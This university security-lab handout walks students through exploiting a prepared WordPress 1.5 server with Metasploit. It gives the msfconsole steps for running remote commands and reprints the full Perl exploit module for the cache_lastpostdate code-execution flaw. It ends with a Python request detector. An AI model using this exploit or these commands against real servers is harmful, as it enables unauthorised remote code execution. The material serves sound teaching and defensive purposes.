If you want to do this lab after the scheduled class you must talk to Magnus first. If you don't do this the computer you will break into will not be available. It is only available on request.

Be a script kiddie

In this lab you will break into a computer which is running a vulnerable version of WordPress (http://www.wordpress.org ), a very common piece of software which runs many blogs on the web. You will use a tool called Metasploit (http://www.metasploit.com/ ) to do this. Metasploit is a tool for exploiting known vulnerabilities on a remote computer.

WordPress is written in PHP and uses a MySQL backend for storing the blogs and comments. Metasploit is mostly written in Perl.

1. Objectives

The main objective of this lab is to show how easy it is to get unauthorized access to another computer on the internet. This will help you understand how important computer security is and hopefully open your eyes regarding your own computer. Our goal is not to make you criminals, just to make you aware of the problems.

What we will not do in this lab is try to find a vulnerable computer in the first place. However, we encourage you to use e.g. nmap (http://insecure.org/nmap/ ) or Nessus (http://www.nessus.org/nessus/ ) to find out if your own computer is vulnerable. These tools scan computers and try, to various extents, to find out what software is running on them. A quick and easy way to test your own computer is to use http://www.testadatorn.se . This is a service run by PTS (Post&Telestyrelsen) which uses Nessus to scan your computer.

Note: DO NOT run tools such as these targeting computers which are not your own. Doing this may be considered an attempt to break in, and may be illegal.

2. Lab description

In this lab you will use the Metasploit Framework. The Metasploit Framework is an open source tool used for executing malicious (exploit) code against a chosen remote machine. The framework comes with a long list of pre-made exploits that can be used to break into a computer. What the user has to know is some information about the remote machine, like its operating system and network services. This information is used for choosing the exploit. After breaking into the computer, the tool can deliver payloads (code that is executed on the remote host after intrusion) to that computer.

The computer you are breaking into has been prepared by us. We have installed vulnerable software on it so you can use a Metasploit exploit to get into it. You have our explicit permission to do this!

3. Step by step

These instructions apply when doing the lab in room 1312 on Friday, September 28. Additional instructions will be available for doing the lab from your own computer, or from the department's Solaris systems.

First boot the computer using the CD provided by us. This is a "live CD" that will boot a Linux system called Knoppix (http://www.knoppix.net ) that has been prepared with the Metasploit program. If it fails to boot, restart the computer and try to type knoppix nodma at the boot prompt. If you want to know what this parameter does you should take the course on operating systems this spring.

Since it is a live CD, no information will be stored on the hard drive. Things you store will be lost when you shut down. We encourage you to use pen and paper to take notes during the lab. There are of course other solutions to this problem which you may explore on your own.

  1. Open a web browser (e.g. Firefox) and surf to http://bakterie.it.uu.se , just to take a look at the WordPress blog.
  2. Open a command shell and run nmap against bakterie.it.uu.se: nmap -A bakterie.it.uu.se. The -A flag will try to give more information about the software that is running on the computer. You should at least find a webserver there.
  3. Start metasploit by entering /opt/framework-2.7/msfconsole in the command shell.
  4. Type show exploits to see what exploits are available. For this lab we use the php_wordpress_lastpost exploit.
  5. To use an exploit type use exploit_name.
  6. Now type show options to see the options that are available for this exploit. One thing that we need to modify is the RHOST option which is the remote computer we are going to attack.
  7. Type set RHOST bakterie.it.uu.se to change RHOST.
  8. Now we can look at the payloads for this exploit. Remember, a payload is code that will be delivered to the remote computer. Use show payloads. We will use the cmd_generic payload. Type set PAYLOAD cmd_generic to use it. This payload is used for executing arbitrary commands on the remote computer.
  9. If we look at the options again, with show options we can see that we have an option for the payload. You can set CMD to the command you want to execute. Let's start with a simple command: set CMD whoami.
  10. After setting the command you have to type exploit to actually execute it.

By changing the CMD you can execute any command of your choice. Some suggestions are:

whoami
This will tell you which user you are on the remote computer.
id
This will tell you even more about who you are.
ls -lF
List the files in the current directory.
echo "Your greeting to the lab assistants." > YourName.txt
This will put the greeting into the file YourName.txt. This is necessary to pass the lab.
cat YourName.txt
This will show you the contents of the file YourName.txt.

Note! Due to the nature of this lab you will have the power to delete files created by other students. Don't do that.

4. Questions

  1. Describe what network services are available locally on the attacked computer. What (if anything) is different from the services available from the outside? Why is it like this? Is it desirable?
  2. If you really were a malicious attacker, how would your attack proceed after getting access to a computer like this? What would you try next?
  3. Explain how the exploit works in principle. What is going on here? The source code of the exploit is listed below, but you should be able to make an educated guess even without it.

In addition to answering the questions above, to pass the lab you also need to leave a greeting on the cracked computer in a file with your name.

Please also use the reflection system to reflect on the lab!

5. Hand-in instructions

If you use sources other than the course book ("Computer Security" by Dieter Gollmann), you must give clear references to these sources (book title and author, URL, etc).

Your answers may be written in English or Swedish, whichever you find easier.

You should send the hand-in either

  • as a signed email from each group member - make sure the contents are identical! Sign the email with certificates which include your student email addresses.
  • if you cannot sign the email for some reason, as a regular email plus a printed version with manual signatures (by all group members who are handing in this way). Put the printed hand-in in the mailbox of Magnus Johansson, outside room 1446 (MIC building 1, fourth floor).

Send the email to and . Please use the subject "sec-cs: lab 2 handin" to make mail sorting easier!

5.1. Deadline

The deadline for handing in is Sunday, October 7, 17:00, but please hand in sooner!

6. Exploit source code

##
#   Title: Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)
#    Name: php_wordpress.pm
# License: Artistic/BSD/GPL
#    Info: I lub metasploit yummmm (str0ke ! milw0rm.com).
#
# Recoded Kartoffelguru's php code for metasploit.  I love cookies. /str0ke
#
#  - This is an exploit module for the Metasploit Framework, please see
#    http://metasploit.com/projects/Framework for more information.
#
##

package Msf::Exploit::php_wordpress_lastpost;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info = {
	'Name'     => 'WordPress cache_lastpostdate Arbitrary Code Execution',
	'Version'  => '$Rev: 3818 $',
	'Authors'  => [ 'str0ke < str0ke [at] milw0rm.com >' ],
	'Arch'     => [ ],
	'OS'       => [ ],
	'Priv'     => 0,
	'UserOpts' =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
		'RPATH' => [1, 'DATA', 'Path WordPress root directory', '/'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	  },

	'Description' => Pex::Text::Freeform(qq{
		This module exploits an arbitrary PHP code execution flaw in the WordPress
		blogging software. This vulnerability is only present when the PHP 'register_globals'
		option is enabled (common for hosting providers). All versions of WordPress prior to
		1.5.1.3 are affected.
}),

	'Refs' =>
	  [
		['OSVDB', '18672'],
		['CVE', '2005-2612'],
		['BID', '14533'],
		['MIL', '86'],
	  ],

	'Payload' =>
	  {
		'Space' => 512,
		'Keys'  => ['cmd', 'cmd_bash'],
	  },

	'Keys' => ['wordpress'],

	'DisclosureDate' => 'Aug 9 2005',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host    = $self->GetVar('RHOST');
	my $target_port    = $self->GetVar('RPORT');
	my $vhost          = $self->GetVar('VHOST') || $target_host;
	my $path           = $self->GetVar('RPATH');
	my $cmd            = $self->GetVar('EncodedPayload')->RawPayload;

	# Add an echo on each end for easy output capturing
	$cmd = "echo _cmd_beg_;".$cmd.";echo _cmd_end_";

	my $encoded = Pex::Text::Base64Encode("passthru(\"$cmd\");", '');

	my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $encoded));
	$byte .= ".chr(32)";

	my $str = Pex::Text::Base64Encode('args[0]=eval(base64_decode('.$byte.')).die()&args[1]=x', '');

	my $data = "wp_filter[query_vars][0][0][function]=get_lastpostdate;wp_filter[query_vars][0][0][accepted_args]=0;".
	  "wp_filter[query_vars][0][1][function]=base64_decode;wp_filter[query_vars][0][1][accepted_args]=1;".
	  "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=$str".
	  ";wp_filter[query_vars][1][0][function]=parse_str;wp_filter[query_vars][1][0][accepted_args]=1;".
	  "wp_filter[query_vars][2][0][function]=get_lastpostmodified;wp_filter[query_vars][2][0][accepted_args]=0;".
	  "wp_filter[query_vars][3][0][function]=preg_replace;wp_filter[query_vars][3][0][accepted_args]=3;";

	my $req =
	  "GET $path HTTP/1.0\r\n".
	  "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\r\n".
	  "Host: $vhost:$target_port\r\n".
	  "Pragma: no-cache\r\n".
	  "Accept: */*\r\n".
	  "Cookie: $data\r\n".
	  "\r\n";

	my $s = Msf::Socket::Tcp->new(
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );

	if ($s->IsError){
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending the malicious WordPress request...");

	$s->Send($req);

	my $results = $s->Recv(-1, 20);
	$s->Close();

	if ($results =~ m/_cmd_beg_(.*)_cmd_end_/ms) {
		my $out = $1;
		$out =~ s/^\s+|\s+$//gs;
		if ($out) {
			$self->PrintLine('----------------------------------------');
			$self->PrintLine('');
			$self->PrintLine($out);
			$self->PrintLine('');
			$self->PrintLine('----------------------------------------');
		}
	}
	return;
}

1;
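The module above only works because register_globals lets a request write WordPress's internal globals (wp_filter, cache_lastpostdate, cache_lastpostmodified) before the blog initialises them. As an added example that is not part of the lab material or of Metasploit, here is a small Python detector a web administrator could run over raw requests: it flags cookies or query parameters that try to set those globals, that register dangerous filter callbacks, or that carry a preg_replace pattern with the 'e' modifier. The global and callback name lists and both sample requests are constructed for this example.

```python
import re
from typing import List, Tuple
from urllib.parse import urlsplit, parse_qsl

# WordPress 1.5.x globals the lab's module overrides from the request; with
# register_globals on, a cookie or query parameter of that name becomes the PHP
# global before WordPress initialises it (names taken from the module's cookie).
SENSITIVE_GLOBALS = {"wp_filter", "cache_lastpostdate", "cache_lastpostmodified"}
# Callbacks a request should never be able to register as a WordPress filter.
DANGEROUS_CALLBACKS = {"base64_decode", "parse_str", "preg_replace", "eval",
                       "passthru", "system", "exec", "shell_exec", "assert"}

def request_params(raw: str) -> List[Tuple[str, str, str]]:
    """Extract (source, name, value) triples from the request line and Cookie header."""
    params = []
    target = raw.split("\r\n", 1)[0].split(" ")        # e.g. "GET /?a=b HTTP/1.0"
    if len(target) >= 2:
        for name, value in parse_qsl(urlsplit(target[1]).query, keep_blank_values=True):
            params.append(("query", name, value))
    m = re.search(r"^Cookie:[ \t]*(.*)$", raw, re.M | re.I)
    if m:
        for item in m.group(1).split(";"):              # PHP splits cookies on ';'
            if "=" in item:
                name, value = item.split("=", 1)
                params.append(("cookie", name.strip(), value.strip()))
    return params

def scan_request(raw: str) -> List[str]:
    """Return findings for one raw HTTP request; an empty list means nothing suspicious."""
    findings = []
    for source, name, value in request_params(raw):
        base = name.split("[", 1)[0]                    # PHP array syntax: wp_filter[...]
        if base in SENSITIVE_GLOBALS:
            findings.append(f"{source} sets internal global '{base}' ({name})")
        if name.endswith("[function]") and value in DANGEROUS_CALLBACKS:
            findings.append(f"filter callback injection: {value}")
        if re.fullmatch(r"/.*/[a-zA-Z]*e[a-zA-Z]*", value):  # preg_replace 'e' modifier
            findings.append(f"preg_replace /e pattern in {name}: {value}")
    return findings

# Constructed sample requests: the first mirrors the cookie layout the module
# sends, with the encoded payload replaced by a placeholder; the second is benign.
SAMPLE_ATTACK = ("GET / HTTP/1.0\r\nHost: blog.example\r\n"
                 "Cookie: wp_filter[query_vars][0][0][function]=get_lastpostdate;"
                 "wp_filter[query_vars][0][1][function]=base64_decode;"
                 "cache_lastpostmodified[server]=//e;cache_lastpostdate[server]=PLACEHOLDER_B64;"
                 "wp_filter[query_vars][1][0][function]=parse_str;"
                 "wp_filter[query_vars][3][0][function]=preg_replace;\r\n\r\n")
SAMPLE_BENIGN = "GET /?p=12 HTTP/1.0\r\nHost: blog.example\r\nCookie: PHPSESSID=abc123\r\n\r\n"
```

Calling scan_request(SAMPLE_ATTACK) yields ten findings while scan_request(SAMPLE_BENIGN) yields none; the real fix for the blog is to disable register_globals (or upgrade past 1.5.1.3), as the module's own description states.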